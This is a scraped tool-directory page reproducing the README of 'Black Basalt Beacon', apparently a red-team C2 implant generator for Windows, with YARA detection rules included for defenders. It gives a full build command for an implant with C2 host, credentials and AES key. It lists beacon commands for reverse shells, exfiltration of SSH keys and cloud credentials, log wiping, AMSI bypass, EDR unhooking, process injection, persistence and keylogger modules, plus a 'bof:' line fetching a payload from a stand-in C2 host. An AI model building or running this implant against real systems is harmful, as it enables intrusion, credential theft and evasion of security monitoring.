SkillAgentSearch skills...

Beacon

Experimental Lightweight Windows pure C Beacon CodeName: BlackBasalt for LazyOwn RedTeam Framework C2

GenerateConvertImprove

Install / Use

/learn @grisuno/Beacon
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

🔥 === Black Basalt Beacon-GEN v0.2.1 ===

<img width="1664" height="928" alt="image" src="https://github.com/user-attachments/assets/e76ce510-dad2-4c6c-9910-c245ff71c9f4" />

🔍 INFO

  • **GitHub Repository: https://github.com/grisuno/beacon
  • **License: GNU General Public License v3.0 (GPLv3)
  • Author: grisun0
  • Target Platform: Windows (x64)
  • Source Platform: GNU/Linux 6.12 (tested on Kali)
  • Purpose: Academic research and red teaming exercises

⚠️ This project is released under GPLv3. See the DISCLAIMER section for full legal terms.

<img width="1712" height="859" alt="image" src="https://github.com/user-attachments/assets/74a13d86-3d7e-4207-a4bd-4231df9e3ea0" />

🔍 Overview

beacon-GEN is a next-generation Bash-based configuration engine designed to generate highly customizable, stealthy C2 beacons for offensive operations. Built as the core orchestration layer of the LazyOwn RedTeam framework, it enables red teams to dynamically configure malleable C2 profiles, AES-256 encrypted communication, multi-UA rotation, and client-side persistence logic — all through a clean, CLI-driven interface.

This script generates the foundational configuration for advanced implants that leverage, APC injection, and anti-analysis routines to evade modern EDR solutions.

Intended for ethical hacking, penetration testing, and academic research, this tool supports seamless integration into automated attack chains and red team infrastructure. <img width="735" height="994" alt="image" src="https://github.com/user-attachments/assets/2cecaa04-2720-4e7f-9a7a-42e77f14f700" />

For RedTeamers

./gen_beacon.sh \
  --target 192.168.1.50 \
  --url https://c2.ejemplo.com:8443 \
  --maleable /api/v2/submit \
  --client-id win10-pro \
  --c2-host 192.168.1.10 \
  --c2-user AdminC2 \
  --c2-pass "P@ssw0rd_Secret_2025" \
  --c2-port 8443 \
  --aes-key aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899 \
  --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
  --user-agent1 "Chrome/120.0.0.0 Safari/537.36" \
  --user-agent2 "CustomAgent/1.0 (compatible)" \
  --user-agent3 "BotNet-X/2.5" \
  --output hellbird.exe
<img width="1438" height="921" alt="image" src="https://github.com/user-attachments/assets/3a724561-230f-462a-bcc4-50bf7da76012" />

For BlueTeamers

rule beacon_GEN_Config_Template {
    meta:
        author = "LazyOwn BlueTeam"
        description = "Detects beacon-GEN generated C2 configuration"
        license = "GPLv3"

    strings:
        $c2_url_macro = "C2_URL \"$URL\"" ascii wide
        $maleable_macro = "MALEABLE \"$MALEABLE\"" ascii wide
        $client_id_macro = "CLIENT_ID \"$CLIENT_ID\"" ascii wide
        $aes_key_64char = /[0-9a-f]{64}/
        $winhttp_init = "WinHttpOpen(" ascii wide
        $user_agent_var = "TRAFFIC_UAS[]" ascii wide
        $output_name = "beacon.exe" ascii wide nocase

    condition:
        all of ($c2_url_macro, $maleable_macro, $client_id_macro) and
        $aes_key_64char and $winhttp_init and $user_agent_var
}

rule hellbird_Runtime_Behavior {
    meta:
        author = "LazyOwn BlueTeam"
        description = "Detects runtime behavior of HELLBIRD beacon"
        reference = "https://github.com/grisuno/hellbird"

    strings:
        $nt_queue_apc = "NtQueueApcThread" ascii wide
        $create_suspended = { 6A 04 6A 00 6A 00 6A 00 6A 00 6A 00 } // CREATE_SUSPENDED
        $aes_decrypt = "AES_ECB_encrypt" ascii wide
        $registry_persistence = "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run" ascii wide
        $http_post_enc = "POST /" ascii wide
        $base64_decode = "base64_decode" ascii wide

    condition:
        $nt_queue_apc and $create_suspended and $aes_decrypt and
        ($registry_persistence or $http_post_enc) and $base64_decode
}

image

Available beacon commands:

  • stealth_off stop being stealthy, Disables stealth mode, allowing normal operations.
  • stealth_on enter ninja mode, Enables stealth mode, minimizing activity to avoid detection.
  • download: download:[filename] Downloads a file from the C2 to the compromised host.
  • upload: [filename]: Uploads a file from the compromised host to the C2.
  • rev: Establishes a reverse shell to the C2 using the configured port.
  • exfil: Exfiltrates sensitive data (e.g., SSH keys, AWS credentials, command histories).
  • download_exec: download_exec:[url]: Downloads and executes a binary from a URL (Linux only, stored in /dev/shm).
  • obfuscate: [filename]: Obfuscates file timestamps to hinder forensic analysis.
  • cleanlogs: Clears system logs (e.g., /var/log/syslog on Linux, event logs on Windows).
  • discover: Performs network discovery, identifying live hosts via ping.
  • adversary:[id_atomic]: Executes an adversary emulation test (MITRE ATT&CK) using downloaded atomic redteam framework scripts.
  • softenum: Enumerates useful software on the host (e.g., docker, nc, python).
  • netconfig: Captures and exfiltrates network configuration (e.g., ipconfig on Windows, ifconfig on Linux).
  • escalatelin: Attempts privilege escalation on Linux (e.g., via sudo -n or SUID binaries).
  • proxy:[listenip]:[listenport]:[targetip]:[targetport] Starts a TCP proxy redirecting traffic from listenAddr to targetAddr.
  • stop_proxy:[listenaddr] Stops a TCP proxy on the specified address.
  • portscan: Scans ports on discovered hosts and the configured rhost.
  • compressdir:[directory]: Compresses a directory into a .tar.gz file and exfiltrates it.
  • sandbox: Get info about the system if it's a sandbox or not.
  • isvm: Get info about the system if it's a virtual machine or not.
  • debug: Get info about the system if the target is debugged or not.
  • persist: Try to persist mechanism in the target system.
  • simulate: Execute a simulation of a legit web page like youtube.
  • migrate: Inject a payload into a suspended process and resume it. If no payload is specified, the current process is injected (self-migration).
  • shellcode: Download and execute a shellcode in memory. Supports multiple operative systems and formats msfvenom friendly (in windows the technique used is Early brid APC Injection).
  • amsi: Bypass AMSI (Anti-Malware Scan Interface) on Windows systems to evade detection by PowerShell, WMI, and other scripting engines.
  • load_module: load dll on Windows systems to evade detection loading in memory from an url
  • bof: load COFF BOF object file on Windows systems to evade detection loading in memory from an url (COFFLoader3 inspired in [COFFLoader] (https://github.com/trustedsec/COFFLoader/) & CoffeeLdr) (Like Cobalt Strike)
  • hook: Get syscalls hooked by AV/EDR/OTHER (By using direct, unhooked syscalls — as demonstrated in functions like CreateFileA_Unhooked and WriteProcessMemory_Unhooked, and implemented via manually resolved NTAPI stubs such as g_pNtCreateFileUnhooked, g_pNtWriteVirtualMemoryUnhooked, g_pNtProtectVirtualMemoryUnhooked, g_pNtResumeThreadUnhooked, and g_pNtCreateThreadExUnhooked — it is possible to invoke low-level Windows API functionality while completely bypassing user-mode hooks commonly placed by security products. This technique is highly evasive against traditional AV and modern EDR solutions, as it avoids instrumented or hooked Win32 API layers entirely, operating directly at the NT syscall boundary — a level where many security tools lack visibility or choose not to monitor due to performance overhead and complexity.).
  • terminate: Terminates the implant or beacon, removing files and persistence mechanisms.

🔥 Modules

This beacon have load_module command you need pass a url to an dll module, for now we have 5 modules, revshell, Metasploit meterpreter, Keylogger, Stealth Command and Screenshot.

<img width="1025" height="893" alt="image" src="https://github.com/user-attachments/assets/74e70f1d-4908-4483-af30-860a60c9bbd7" />
  • Reverse Shell : gen_dll_rev.sh
  • Metasploit Meterpreter: gen_dll.sh
  • Screenshot: gen_dll_ss.sh
  • Keylogger: gen_key.sh
  • Stealth Command: gen_module.sh
<img width="1697" height="516" alt="image" src="https://github.com/user-attachments/assets/14c62e2a-321d-4996-b2c0-98a165499f1e" />

🚀 Feature: bof: — Execute COFF BOF Objects In-Memory (Cobalt Strike Style)

<img width="1328" height="1328" alt="image" src="https://github.com/user-attachments/assets/22e3d203-764e-4c7f-8f74-83797c4440fd" />

Evade EDR/AV detection by loading and executing position-independent BOF (Binary Object File) payloads directly from a remote URL — without touching disk, without LoadLibrary, and without traditional PE loaders.

This feature is inspired by — but goes beyond — industry-standard tools like TrustedSec’s COFFLoader and CoffeeLdr . It’s engineered for stealth, reliability, and deep Windows internals compliance.

<img width="1710" height="602" alt="image" src="https://github.com/user-attachments/assets/99a5a560-8926-4743-af7c-99b46ef9129e" />

🎯 How It Works — The Engineering Breakdown

  1. Command Syntax
bof:http://your-c2.com/payload.x64.o [optional_args]
  • Downloads the raw .o (COFF) file over HTTP(S).
  • Parses the COFF structure in-memory.
  • Maps sections (.text, .rdata, .pdata, etc.) into PAGE_EXECUTE_READWRITE regions.
  • Applies x64 relocations (ADDR64, REL32, REL32_1-5, etc.) with trampoline generation for out-of-range jumps.
  • Resolves external symbols (e.g., BeaconPrintf, GetModuleHandleA, CoInitializeEx) via a precomputed DJB2 hash table.
  • Executes the target function (usually go) with aligned stack and proper calling convention (ms_abi).
<img width="768" height="992" alt="image" src="https://github.com/user-attachments/assets/a1732ce6-2910-4ae4-9c68-9aea15a70d38" />

grisuno

View profile

View on GitHub
GitHub Stars10
CategoryDevelopment
Updated1mo ago
Forks1
grisuno/beacon

Languages

C

Security Score

95/100

Audited on Jan 27, 2026

No findings